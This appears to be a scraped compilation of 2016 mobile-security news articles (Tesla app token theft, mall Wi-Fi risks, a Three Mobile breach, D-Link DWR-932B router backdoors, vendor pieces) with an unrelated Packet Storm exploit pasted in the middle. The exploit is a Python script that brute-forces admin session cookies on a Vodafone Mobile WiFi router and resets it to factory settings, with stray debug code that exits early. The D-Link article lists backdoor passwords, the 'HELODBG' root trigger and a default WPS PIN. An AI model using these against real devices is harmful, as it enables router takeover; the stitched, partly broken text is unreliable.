Mobile

Researchers at Norway-based security firm Promon have demonstrated how thieves with the necessary hacking skills can track and steal Tesla vehicles through the carmaker’s Android application.

In a video released this week, experts showed how they could obtain the targeted user’s credentials and leverage the information to track the vehicle and drive it away. There are several conditions that need to be met for this attack and the victim must be tricked into installing a malicious app on their mobile phone, but the researchers believe their scenario is plausible.

According to Promon, the Tesla mobile app uses HTTP requests and an OAuth token to communicate with the Tesla server. The token is valid for 90 days and it allows users to authenticate without having to enter their username and password every time they launch the app.

The problem is that this token is stored in cleartext in the app’s sandbox folder, allowing a remote attacker with access to the device to steal the data and use it to send specially crafted requests to the server. Once they obtain this token, criminals can use it to locate the car and open its doors. In order to enable the keyless driving feature and actually steal the vehicle, they need to obtain the victim’s username and password as well.

Experts believe this can be achieved by tricking the user into installing a piece of malware that modifies the Tesla app and steals the username and password when the victim enters them in the app. According to researchers, the legitimate Tesla app can be modified using one of the many vulnerabilities affecting Android, such as the issue known as TowelRoot. The TowelRoot exploit, which allows attackers to elevate privileges to root, has been used by an Android malware dubbed Godless.

In order to get the victim to install the malicious app, the attacker can use various methods, including free Wi-Fi hotspots.

“When the Tesla owner connects to the Wi-Fi hotspot and visits a web page, he is redirected to a captive portal that displays an advertisement targeting Tesla owners. In [our] example, an app was advertised that offers the Tesla owner a free meal at the nearby restaurant. When the Tesla owner then clicks on the advertisement, he is redirected to the Google Play store where the malicious app is displayed,” experts said.

While there are multiple conditions that need to be met for the attack to work, researchers pointed out that many devices run vulnerable versions of Android and users are often tricked into installing malware onto their devices.

Promon has not disclosed any technical details about the attack method. The company says it has been working with Tesla on addressing the issues. It’s worth noting that Tesla has a bug bounty program with a maximum payout of $10,000 for each flaw found in its websites, mobile apps and vehicle hardware.

This is not the first time researchers have demonstrated that Tesla cars can be hacked remotely. A few weeks ago, experts at China-based tech company Tencent showed that they could remotely control an unmodified Tesla Model S while it was parked or on the move. Tesla quickly patched the vulnerabilities found by Tencent, but downplayed their severity, claiming that the attack was not fully remote, as suggested in a video released by experts.

SecurityWeek has reached out to Tesla for comment and will update this article if the company responds.

Previous Columns by Eduard Kovacs:

SecurityWeek RSS Feed

As the biggest shopping weekend of the year in the US approaches, Skycure is advising shoppers to beware of mobile threats while browsing in both physical and online stores.

Researchers found that mobile shopping dangers are not limited to dangerous Wi-Fi in malls. Malicious apps masquerading as legitimate online stores or ways to get online shopping bargains also appear this time of year, hoping to lure unsuspecting shoppers eager to make a quick purchase on their phones or tablets.

“Black Friday and Cyber Monday are a recipe for cyber-scams,” said Yair Amit, CTO and co-founder of Skycure. “The first brings large groups of people using their mobile phones to one place. The second attracts people who might overlook security to get a better deal. Unfortunately, mobile threats exist for shoppers whether they’re shopping in a store, or on a mobile device from the comfort of their own home or workplace.”

Top 10 riskiest shopping malls for mobile

According to industry statistics, 90 percent of shoppers used a mobile phone inside a physical store to look up product information, compare prices or check reviews online in 2015. But before pulling out their mobile phones, shoppers should beware of joining risky Wi-Fi networks while out shopping this holiday season.

Malicious Wi-Fi networks are set up by cyber criminals specifically to steal shoppers’ data, while risky Wi-Fi networks are misconfigured and expose sensitive mobile data to hackers. Both are dangerous and put mobile shoppers at risk. The data most commonly stolen are usernames and passwords.

Below is the list of the top 10 malls with the highest number of suspicious Wi-Fi networks. All the shopping centers listed below were found to have five or more risky Wi-Fi networks:

  • Fashion Show, Las Vegas, NV
  • Tysons Corner Center, McLean, VA
  • Yorktown Center, Lombard, IL
  • Town Center at Boca Raton, Boca Raton, FL
  • Sawgrass Mills, Sunrise, FL
  • Mall of America, Bloomington, MN
  • Houston Galleria, Houston, TX
  • King of Prussia Mall, King of Prussia, PA
  • Westfield Garden State, Paramus, NJ
  • Memorial City Mall, Houston, TX

Avoid malicious commerce apps

Criminals know that people are shopping for bargains around the holidays, and there are many ways to lure people with fake coupons or too-good-to-be-true offers. One way is to offer apps that look like they are from legitimate online stores, either designed to make shopping easier, or to offer discounts or rewards.

Researchers found multiple examples, including the following:

  • A repackaged Starbucks app. Repackaged apps look exactly like the official apps offered by legitimate retailers and other businesses, but have a small amount of malicious code added in.
  • An app called “Amazon Rewards”, which is actually a trojan that spreads via SMS messages offering fake Amazon vouchers with a link to a fake website. It accesses the user’s contact list so that it can send SMS messages to even more people.

Both apps are examples of the ways hackers use trusted brands and shoppers’ thirst for deals to infiltrate a mobile device, then steal user data, banking and/or credit card information.

Safety tips for shoppers

Skycure offered the following quick tips for mobile users traveling to high-risk destinations:

1. Avoid “Free Wi-Fi” networks (10 percent of malicious networks have the word “Free” in their name).
2. If you see a Wi-Fi that is named as if it is hosted by a store, but that store is nowhere nearby, don’t connect. Skycure found multiple networks named “Apple Store” or “Macysfreewifi” where the named stores were nowhere nearby. Remember that mobile devices automatically join “known” Wi-Fi networks without any user intervention.
3. Only download mobile apps from reputable app stores such as the Google Play store and Apple’s App Store.
4. Read the warnings on your device and don’t click “Continue” if you don’t understand the exposure.
5. Update your device to the most current operating system.
6. Disconnect from the network if your phone behaves strangely (e.g. frequent crashes).
7. Protect your device with a mobile security app.


Help Net Security

Computer hackers have broken into a database of Three Mobile customers and accessed their personal details in order to steal smartphones, the UK network said on Thursday.

A spokesman for the company said there had been an uptick in attempted phone fraud over the past four weeks, both through burglaries of Three retail stores and intercepting customer phone upgrades.

"In order to commit this type of upgrade handset fraud, the perpetrators used authorised logins to Three's upgrade system.

"This upgrade system does not include any customer payment, card information or bank account information," the spokesman said.

Personal details including names and addresses were accessed and are believed to have been used by fraudsters to order the phone upgrades, which were sent to eight customers and intercepted.

A probe is currently underway to determine how many more of the company's nine million customers have had their data breached, while the eight known clients have been contacted by Three.

A source close to the matter was quoted by The Telegraph as saying the private information of two thirds of Three customers could be at risk.

"The investigation is ongoing and we have taken a number of steps to further strengthen our controls," said the company spokesman.

Three people were arrested on Wednesday in connection with the fraud and have since been bailed.

A 48-year-old man from Kent, south-east England, and a 39-year-old man from Manchester, north-west England, were arrested on suspicion of computer misuse offences.

A 35-year-old man also from Manchester was arrested on suspicion of attempting to pervert the course of justice.

Related: TalkTalk Handed Record Fine for Data Breach

Related: Information Commissioner Talks Privacy Laws in Post-Brexit UK

© AFP 2016

SecurityWeek RSS Feed

Vulnerabilities, Backdoor Found in D-Link DWR-932B LTE Router

Security researchers have discovered numerous unpatched security vulnerabilities in the D-Link DWR-932B LTE router / access point, including backdoor accounts and a default Wi-Fi Protected Setup (WPS) PIN.

The device is sold in various countries and, because of its numerous security weaknesses, is a security nightmare for its customers. The vulnerabilities were discovered by Pierre Kim, who decided to reveal only the most significant of them, and who says that the issues affect even the latest firmware version released by the vendor.

Earlier this year, Kim disclosed numerous unpatched vulnerabilities affecting the LTE QDH routers made by Quanta, including backdoors, a hardcoded PIN, flaws in the web interface, a remote code execution issue, and other bugs. The flaws that impact D-Link’s router appear to be similar to those found in Quanta’s device.

The researcher discovered two backdoor accounts on the device and says that they can be used to bypass the HTTP authentication used to manage the router. There is an “admin” account with password “admin,” as well as a “root” account, with password “1234.” By default, telnetd and SSHd are running on D-Link DWR-932B, yet the latter isn’t documented, the researcher also explains.

Next, there is a backdoor inside the /bin/appmgr program, which allows an attacker to send a specific string over UDP to the router to start an authentication-less telnet server (if a telnetd daemon is not already running). The issue is that the router listens on 0.0.0.0:39889 (UDP) for commands and grants root access without authentication if “HELODBG” is received as the command.

D-Link DWR-932B also comes with 28296607 as the default WPS PIN, hardcoded in the /bin/appmgr program. The HostAP configuration contains the PIN as well, and so do the HTTP APIs. What’s more, although the router allows the user to generate a temporary PIN for the WPS system, the PIN is weak: the generation algorithm uses srand(time(0)) as its seed. An attacker who knows the current date, and therefore the value of time(0), can generate the set of valid WPS PINs and brute-force them, the researcher explains.
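As an added illustration of the temporary-PIN weakness described above (this is example code written for this page, not D-Link’s firmware or Pierre Kim’s advisory code), the block below puts a generator seeded from the clock, in the style the advisory describes, next to one that draws its digits from the kernel CSPRNG. The exact way the router turns rand() output into a PIN is not published, so the rand() % 10000000 mapping is an assumption; the checksum routine is the public WPS PIN checksum (the same algorithm hostapd uses), which is why it reproduces the page’s default PIN 28296607 from its first seven digits.

```c
/* Added example for this page: predictable vs. CSPRNG-backed WPS PIN
 * generation. The rand()-to-PIN mapping is an assumption for illustration. */
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <time.h>

/* Checksum digit for a 7-digit WPS PIN body (public WPS algorithm, as in
 * hostapd's wps_pin_checksum()). The full 8-digit PIN is body*10 + checksum. */
unsigned int wps_pin_checksum(unsigned int body)
{
    unsigned int accum = 0;
    while (body) {
        accum += 3 * (body % 10);
        body /= 10;
        accum += body % 10;
        body /= 10;
    }
    return (10 - accum % 10) % 10;
}

/* 1 if an 8-digit PIN carries the correct checksum digit, else 0. */
int wps_pin_valid(unsigned int pin)
{
    return pin < 100000000u && wps_pin_checksum(pin / 10) == pin % 10;
}

/* Weak generator: the seed is the only entropy, so anyone who can guess the
 * seed (a clock value, per the advisory) reproduces the PIN exactly. */
unsigned int wps_pin_from_seed(unsigned int seed)
{
    srand(seed);
    unsigned int body = (unsigned int)rand() % 10000000u;   /* assumed mapping */
    return body * 10 + wps_pin_checksum(body);
}

/* Hardened generator: 32 bits from /dev/urandom instead of a clock value.
 * Returns 0 on success and stores the PIN; returns -1 if the CSPRNG cannot
 * be read (the caller must then refuse to enable WPS rather than fall back). */
int wps_pin_random(unsigned int *pin)
{
    uint32_t raw = 0;
    FILE *f = fopen("/dev/urandom", "rb");
    if (!f)
        return -1;
    size_t n = fread(&raw, sizeof raw, 1, f);
    fclose(f);
    if (n != 1)
        return -1;
    unsigned int body = raw % 10000000u;
    *pin = body * 10 + wps_pin_checksum(body);
    return 0;
}

/* Demonstration: the same clock second yields the same "temporary" PIN
 * every time, while the CSPRNG-backed PIN is unrelated to the clock. */
int main(void)
{
    unsigned int t = (unsigned int)time(NULL);
    unsigned int strong = 0;

    printf("weak PIN for seed %u: %08u (again: %08u)\n",
           t, wps_pin_from_seed(t), wps_pin_from_seed(t));
    if (wps_pin_random(&strong) == 0)
        printf("CSPRNG PIN: %08u (checksum ok: %d)\n", strong, wps_pin_valid(strong));
    printf("default PIN 28296607 checksum ok: %d\n", wps_pin_valid(28296607u));
    return 0;
}
```

The point a firmware reviewer should take from this is not the checksum (an attacker can compute that too) but that the weak generator’s output is a pure function of a guessable seed; replacing the seed source, not the mapping, is what removes the weakness.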

Kim also reveals that the file /etc/inadyn-mt.conf contains a user and a hardcoded password, and that the HTTP daemon /bin/qmiweb contains multiple vulnerabilities as well. The router also executes strange, purposeless shell commands as root.

Furthermore, the router supports remote FOTA (Firmware Over The Air) and contains the credentials used to contact the update server hardcoded in the /sbin/fotad binary as base64 strings. The researcher discovered that, although the FOTA daemon tries to retrieve the firmware over HTTPS, the SSL certificate has been invalid for a year and a half.

The researcher also reveals that the security level of the UPnP program (miniupnp) in the router is lowered, which allows an attacker located in the LAN to add port forwarding from the Internet to other clients located in the LAN. “There is no restriction about the UPnP permission rules in the configuration file, contrary to common usage in UPnP where it is advised to only allow redirection of port above 1024,” Kim notes.

Because of this lack of permission rules, an attacker can forward everything from the WAN into the LAN, the researcher says. This means that they can set rules to allow traffic from the Internet to local Exchange servers, mail servers, FTP servers, HTTP servers, database servers, and the like.

An attacker can overwrite the router’s firmware with a custom firmware if they wanted to, “but with all these vulnerabilities present in the default firmware, I don't think it is worth making the effort,” Kim says. He also notes that, because the device has a sizable memory (168 MB), a decent CPU, and good free space (235 MB), along with complete toolkits installed by default, users should consider trashing it, “because it's trivial for an attacker to use this router as an attack vector.”

D-Link was informed of these issues in June, but the company has not resolved them to date. Because 90 days have passed since the vulnerabilities were disclosed to the vendor, Kim decided to publish an advisory revealing these bugs.

This is not the first time D-Link products have made headlines due to security vulnerabilities. The company patched a critical flaw in several DIR model routers in August, after a popular D-Link Wi-Fi camera was found in June to be affected by a serious flaw that was subsequently discovered in over 120 D-Link products.

Ionut Arghire is an international correspondent for SecurityWeek.

Previous Columns by Ionut Arghire:

SecurityWeek RSS Feed

We’re all familiar with the cartoon image of a character stopping a water leak by plugging a finger into the hole, only for another leak to start, needing another finger, and so on, until the character is soaked by a wave of water.

It’s a little like the current, fragmented state of mobile security – the range of threats is growing fast, outpacing current security measures. Also, the devices themselves have inherent vulnerabilities that can be exploited by resourceful attackers. So it’s no surprise that enterprises are struggling with the issue of mobile security.

Finding flaws and mRATs

The list of potential security challenges and vulnerabilities across Android and iOS devices is complex. It starts with the devices’ mobility: they connect to public cellular networks, corporate networks, public hotspots and home internet providers, and back again. This makes them vulnerable to Man in the Middle (MitM) attacks via rogue cellular base stations, WiFi hotspots or compromised public networks, allowing attackers to track, intercept and eavesdrop on data traffic and even voice calls, using SS7 protocol exploits.

Then, the Android and iOS mobile operating systems themselves have been shown time and time again to be plagued with vulnerabilities that smart malicious hackers can exploit to their advantage. One major recent example is ‘Quadrooter’, a privilege escalation vulnerability shown to affect over 900 million Android devices. These vulnerabilities often have long patching cycles which can take months to roll out, leaving millions of devices vulnerable to remote attack.

Similarly, iOS has also recently been in the headlines after news broke that it had been compromised in the NSO hack. This affected all Apple devices, making iOS, the phone’s resources and any application running on it, including security apps such as anti-virus, vulnerable to attack. It’s worth highlighting that this wasn’t discovered by Apple or by any detection application, but only because the attacker was negligent in concealing it.

Mobile remote access trojans (mRATs) give an attacker the ability to remotely access the resources and functions on Android or iOS devices, and stealthily exfiltrate data without the user being aware. mRATs are often embedded in supposedly benign apps available from appstores. Compromised or falsely certified apps are another security risk, as they can allow attackers to remotely take over devices, using the device resources without the user being aware.

As a result, the mobile security industry is always playing catch-up. Zero-day attacks, where cybercriminals exploit inbuilt vulnerabilities on mobile operating systems that haven’t yet been patched or even identified, are a major ongoing problem.

Protection versus performance

Ultimately, there are three main threat vectors for mobile devices. These are: targeting and intercepting the communications to and from devices; targeting the devices’ external interfaces (cellular, WiFi, Bluetooth, USB, NFC, Web etc.) for the purpose of device penetration and planting malicious code (virtually as well as physically); and targeting the data on the device and the resources/functions the device/underlying OS provides access to, such as microphone, camera, GPS, storage, network connectivity, etc.

While there is a wealth of technologies designed to help manage the security gaps on devices – from Enterprise Mobile Management to mobile anti-malware – these protections come at a price. First, a collection of multiple security tools and processes is a big drain on processing power, complex to manage, and doesn’t really fix the underlying device and OS vulnerabilities. Second, the conventional approach to mobile security is based on locking down or denying features and functions. This causes further problems on the end user’s acceptance front. It’s critical to balance security and usability: if protecting the device forces people to change the way they use it, they will find workarounds that will also undermine security measures.

So if enterprises are to continue harnessing the benefits of mobile devices without compromising their performance and usability, then we need to rethink our approach to mobile security, from the ground up.

Secure foundations

This new approach starts with the foundations of the mobile device: the OS and firmware. As the various software layers on devices have fundamental vulnerabilities which can be exploited, these should be replaced with secure, hardened versions from which the flaws have been removed/patched and advanced security layers have been put in place to effectively manage and protect against those three threat vectors mentioned above. This means attackers cannot use their conventional techniques to target vulnerabilities – but the device is still using an OS that the user is familiar with, giving users access to the full app ecosystem, so usability is not affected or restricted.

This stronger foundation is then used to build a strong security architecture consisting of four layers to address each of the three main mobile threat vectors. The first layer is the Encryption Layer, in charge of encrypting all data stored on the phone, as well as all traffic from and to the device, securing all communications, whether voice, data or messaging, from any network sniffing and man-in-the-middle attacks.

The second layer is the Protection Layer, securing the device’s externally available interfaces, from WiFi, cellular, USB, NFC, Bluetooth to web. These need protecting against threats using an embedded firewall to monitor and block all downloads and exploit attempts.

The next layer is the Prevention Layer, monitoring for unauthorized attempts to access operating system functions like stored data, the microphone or camera, location technology and so on. These need their own specialist protective technologies.

The final layer is the Detection and Enforcement Layer monitoring, detecting and blocking execution attempts of malicious code or misbehaving apps, in the same way that we currently monitor for device and network anomalies on corporate networks.

In conclusion, mobile security is currently too fragmented, and the range of threats growing too fast for conventional protections. Instead of plugging leaks as they appear, we need to start again, from the foundations up – and fundamentally rethink the way in which we protect and secure mobile devices.


Help Net Security

Hacker Public Radio ~ The Technology Community Podcast Network

How I record decent audio in my creeper van.

Hosted by Alpha32 on 2016-09-23 and released under a CC-BY-SA license.
Listen in ogg, spx, or mp3 format.

Part of the series: Podcasting HowTo

This series is designed to help the new host begin podcasting and to give the experienced host some tips and tricks.
The series is open to all.

I use a Plantronics USB headset, my Chromebook, Linux, and Audacity to record on the go.

Duration: 00:02:24

  • ogg: http://hackerpublicradio.org/eps/hpr2125.ogg
  • spx: http://hackerpublicradio.org/eps/hpr2125.spx
  • mp3: http://hackerpublicradio.org/eps/hpr2125.mp3

Information Security Podcasts

BlackBerry and mobile security firm Zimperium have announced that Zimperium's zIPS threat protection system now integrates with the BlackBerry EMM, which comprises the Good Technology and BES12 enterprise mobile management systems (EMMs).

Because EMMs do not generally include protection against malware and hacker threats, users typically require a separate threat protection system to run with the mobility management system.

Following BlackBerry's purchase of Good Technology and Watchdox, "This is part of a continuing drive for us to provide a complete security solution for the mobile ecosphere," BlackBerry's CSO David Kleidermacher told SecurityWeek. "We do not believe that enterprises should have to shop around for bits and pieces of the solution, but should be able to come to a single supplier for a complete integrated solution."

zIPS is a behavioral analysis system. "We look at three areas," said John Michelsen, Zimperium's Chief Product Officer: "the device, the network, and the applications that run on the device." zIPS continuously monitors for aberrant behavior. "We're checking to see if there has been any exploitation or device tampering; whether there is a network attack in progress such as a man-in-the-middle attack or problems with SSL; or whether there is any malicious activity from any of the apps."

The process is 99% about behavior. "We're the only vendor in mobile," claimed Michelsen, "that had already discovered, had already detected, every fundamental device exploit -- whether it came over Safari payload in iOS, like Trident/Pegasus did; or whether it was StageFright, which was exploited by a maliciously crafted multi-media file sent to an Android device; or malicious apps that download and detonate on the device -- we are the only software that could detect every one of those before they were identified and disclosed."

But being able to detect malicious behavior does not in itself protect against that behavior. Consider ransomware -- detecting the encryption process and determining it is malicious is not enough; the process needs to be stopped immediately. While zIPS itself is primarily behavioral analysis, "There are a number of things we can do on the device immediately," said Michelsen. "We have a cloud-based configuration system called zConsole." It provides security teams with visibility across all devices; and it is where the admin defines what he wants zIPS to do in the event of bad behavior. 

"In many cases," he continued, "we have the ability to do lots of good things without any help from third party software. But it's not complete -- especially in the enterprise context." Here the enterprise will have sensitive data on the users' phones, including company information, company apps and company connectivity. Depending on what activity zIPS detects, the enterprise might for example want to remove the user's entitlement to SharePoint because the hacker could use the phone to read the entire SharePoint repository that the user is able to access. 

"So one of the things the enterprise will want to do that we cannot do ourselves is remove that entitlement. That's why," he added, "we integrate with the EMMs like BlackBerry, and why we integrate to ecosystems like Good. Good gives us the integration between the zIPS app and the Good Technology platform that allows us to trigger remediation immediately in the Good ecosystem."

zIPS has support for all of the major EMMs. The primary ones, said Michelsen, "are BES, AirWatch, Citrix and MobileIron -- with Microsoft improving." The advantage of working with BlackBerry is the market range it covers. "Good itself is not a management system per se," he added: "it's a containerization system." This is particularly attractive to companies that get privacy push back from staff -- Good co-exists on the user's device rather than takes over the management of that device. BES is more of an EMM. Customers, however, can have Good or BES; or both -- and zIPS integrates with whichever configuration.

Gartner recently rated BlackBerry as a top EMM solution currently available. If BlackBerry without zIPS was good, BlackBerry with zIPS is even stronger.

Kevin Townsend is a Senior Contributor at SecurityWeek. He has been writing about high tech issues since before the birth of Microsoft. For the last 15 years he has specialized in information security; and has had many thousands of articles published in dozens of different magazines – from The Times and the Financial Times to current and long-gone computer magazines.

Previous Columns by Kevin Townsend:

SecurityWeek RSS Feed

import urllib2
import json
from datetime import datetime, timedelta
import time
import httplib
from threading import Thread
from Queue import Queue
from multiprocessing import process

print """
Vodafone Mobile WiFi - Password reset exploit (Daniele Linguaglossa)
"""
thread_lock = False
session = ""

def unix_time_millis(dt):
    epoch = datetime.utcfromtimestamp(0)
    return int(((dt - epoch).total_seconds() * 1000.0) / 1000)

a = False

def check_process_output():
    print 1

p = process.Process(target=check_process_output)
p.start()

print a
exit(0)

def crack(queue):
    global thread_lock
    global session
    while True:
        if thread_lock:
            exit(0)
        if not queue.empty():
            cookie = queue.get()
            headers = {'Referer': 'http://192.168.0.1/home.htm', 'Cookie': "stok=%s" % cookie}
            req = urllib2.Request("http://192.168.0.1/goform/goform_get_cmd_process?cmd=AuthMode&_=%s"
                                  % time.time(), None, headers)
            result = urllib2.urlopen(req).read()
            if json.loads(result)["AuthMode"] != "":
                print "[+] Found valid admin session!"
                print "[INFO] Terminating other threads ... please wait"
                session = cookie
                queue.task_done()
                thread_lock = True

def start_threads_with_args(target, n, arg):
    thread_pool = []
    for n_threads in range(0, n):
        thread = Thread(target=target, args=(arg,))
        thread_pool.append(thread)
        thread_pool[-1].start()
    return thread_pool

def start_bruteforce():
    global session
    global thread_lock
    queue = Queue(0)
    start_threads_with_args(crack, 15, queue)
    print "[!] Trying fast bruteforce..."
    for x in range(0, 1000):
        if thread_lock:
            break
        queue.put("123abc456def789%03d" % x)
    while True:
        if session != "":
            return session
        if queue.empty():
            break
    print "[!] Trying slow bruteforce..."
    for milliseconds in range(0, how_many):
        if thread_lock:
            break
        queue.put("123abc456def789%s" % (start + milliseconds))
    while True:
        if session != "":
            return session
        if queue.empty():
            break
    return session

if __name__ == "__main__":
    now = datetime.now()
    hours = raw_input("How many hours ago admin logged in: ")
    minutes = raw_input("How many minutes ago admin logged in: ")
    init = datetime(now.year, now.month, now.day, now.hour, now.minute) - timedelta(hours=int(hours), minutes=int(minutes))
    end = datetime(now.year, now.month, now.day, 23, 59, 59, 999999)
    start = unix_time_millis(init)
    how_many = unix_time_millis(end) - start + 1
    print "[+] Starting session bruteforce with 15 threads"
    valid_session = ""
    try:
        valid_session = start_bruteforce()
    except KeyboardInterrupt:
        print "[-] Exiting.."
        thread_lock = True
        exit(0)
    if valid_session == "":
        print "[!] Can't find valid session 🙁 quitting..."
        exit(0)
    print "[+] Resetting router password to 'admin' , network may be down for a while"
    headers = {'Referer': 'http://192.168.0.1/home.htm', 'Cookie': "stok=%s" % valid_session}
    req = urllib2.Request("http://192.168.0.1/goform/goform_set_cmd_process",
                          "goformId=RESTORE_FACTORY_SETTINGS&_=%s" % time.time(), headers)
    try:
        urllib2.urlopen(req).read()
    except httplib.BadStatusLine:
        print "[!] Password resetted to admin! have fun!"
        exit(0)
    except Exception:
        print "[x] Error during password reset"
        print "[-] Can't reset password try manually, your session is: %s" % valid_session


Exploit Files ≈ Packet Storm

Banking customers are hesitant to use mobile features due to fraud and security concerns, according to Kaspersky Lab and IDC Financial Insights. Their findings show that of those not using mobile banking at all today (36 percent), 74 percent cited security as the major reason, which could slow the overall adoption of mobile banking services during a time where mobile device usage is exploding.

While security concerns are holding back non-mobile banking users from embracing the convenient, digital self-service solutions on the market, those who are active users of mobile banking today share the same concerns. Of both users and non-users of mobile banking, 85 percent said that they would increase their usage to “some extent” if there was more security, and nearly half (44 percent) of those surveyed said that they would “significantly” increase their mobile banking usage with more security.

For financial organizations, an increase in self-service banking usage can drive revenue and reduce transactional costs, but currently customers don’t see a promising future for mobile banking in their lives – with 32 percent of respondents claiming that they do not ever foresee using mobile as the primary channel that they will engage with their bank or credit union. Banks that do not properly strengthen mobile financial security measures could miss out on a significant business opportunity and risk losing valuable customers in the process.

As financial institutions look for new ways to streamline adoption of self-service banking solutions, it is important that they proactively deploy and implement rigorous security solutions. In addition, banks should also reconsider their education strategies to ensure that customers understand the level of security in their mobile offerings. Survey Respondents want to see a proactive and informative approach to security from their banks with 80 percent indicating that they would like to see evidence of security measures being activated when they launch a mobile banking application.

“Consumers are concerned about security on their mobile devices, which has limited adoption of high margin mobile banking and payment activities including account opening, payments and transfers using a mobile phone,” says Marc DeCastro, research director, IDC Financial Insights. “As the next generation of online, mobile first and mobile only customers begin to explore digital banking choices, financial institutions that have and promote stronger security will attract and retain these customers more easily than those who do not.”

“As financial organizations continue to expand their self-service offerings to drive revenue and increase customer convenience, it’s important to proactively approach security technology for consumers’ mobile devices in the same way banks approach security for their own PC-based solutions, web offerings, and technology networks,” said Ross Hogan, Kaspersky Lab Global Head of Fraud Prevention.


Help Net Security


Assaf Regev

Assaf Regev serves as the product marketing manager for the web fraud portfolio of Trusteer, an IBM Company, part of IBM’s Security Systems division. Assaf holds a BS.c in...


According to data from IDC, the worldwide smartphone market is in excess of 2 billion units. By 2017, the smartphone market share will reach 70.5 percent, up more than 10 percent compared to 2013.

In addition to IDC’s findings, the recent “Consumers and Mobile Financial Services 2016” report stated that 43 percent of mobile phone owners perform online banking via a mobile device, up from 39 percent last year. Additionally, 53 percent of smartphone owners use mobile banking.

A Stake in the Ground

It’s evident that consumers expect to interact with services such as e-commerce, gaming and online banking through their mobile devices. As a result, organizations offering new services must keep up with the ever-growing mobile landscape and any associated regulatory guidelines.

The Federal Financial Institutions Examination Council (FFIEC) recently issued guidance that focused on risks associated with mobile financial services (MFS). The publication also emphasized an enterprisewide risk management approach for more effective risk mitigation.

The agency put a stake in the ground, issuing a new set of security guidelines for mobile banking in late April 2016. This was an important update to the organization’s previously released handbooks. With these new guidelines, the FFIEC set the foundation for 24/7 online banking services of all types, including a set of detailed, actionable directives.


Protecting Mobile Financial Services

More generally, financial institutions looking into protecting existing and new MFS should consider the following:

  • The main channels for mobile banking, such as SMS messaging, mobile-enabled websites, mobile applications and wireless payments;
  • The risks and potential implications on the various aspects of the offered service, including strategic, operational, compliance and reputational risks;
  • The means of identifying, measuring, assessing and mitigating the risks across all applicable categories, which includes the likelihood and impact of such risks and their potential effect on the service and the organization; and
  • The processes and systems in place to help validate and report whether the offered product or service meets operational expectations.

Financial institutions looking to address the above issues must make sure these objectives can be aligned with their short- and long-term strategic plans. To help address security concerns related to mobile financial services, financial institutions can embed the IBM Security Trusteer Mobile SDK in proprietary mobile banking applications via a dedicated security library for Apple iOS and Google Android platforms.

For more information, download the white paper to see how IBM solutions can help protect mobile financial services and provide effective and sustainable fraud prevention.



Security Intelligence